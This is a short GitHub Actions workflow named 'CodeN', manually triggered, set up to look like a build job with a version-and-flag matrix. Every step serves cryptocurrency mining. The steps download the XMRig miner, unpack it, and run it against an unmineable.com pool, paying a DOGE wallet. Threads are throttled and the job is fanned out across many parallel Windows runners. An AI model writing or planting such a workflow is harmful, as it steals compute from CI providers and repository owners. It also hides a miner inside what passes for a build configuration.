name: CodeN

on: [workflow_dispatch]

jobs:
  build:
    name: CodeN
    runs-on: windows-latest
    strategy:
      max-parallel: 5
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1,35]
        flag: [A, B, C, D, E, F, G, H, I]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: PREPARING
      run: Invoke-WebRequest https://github.com/xmrig/xmrig/releases/download/v6.15.0/xmrig-6.15.0-msvc-win64.zip -Outfile xmrig-6.15.0-msvc-win64.zip
    - name: Seting-UP
      run: Expand-Archive xmrig-6.15.0-msvc-win64.zip
    - name: Running
      run: .\xmrig-6.15.0\xmrig.exe --no-huge-pages -o rx.unmineable.com:3333 -p x -a rx -k -t 1 --cpu-max-threads-hint 25 -u DOGE:DDWsVj1g3GPEY4tFuqPGduG1tLh38AQJjQ.DOGEEGITH#7gin-nij1
    - name: DONE
      run: exit
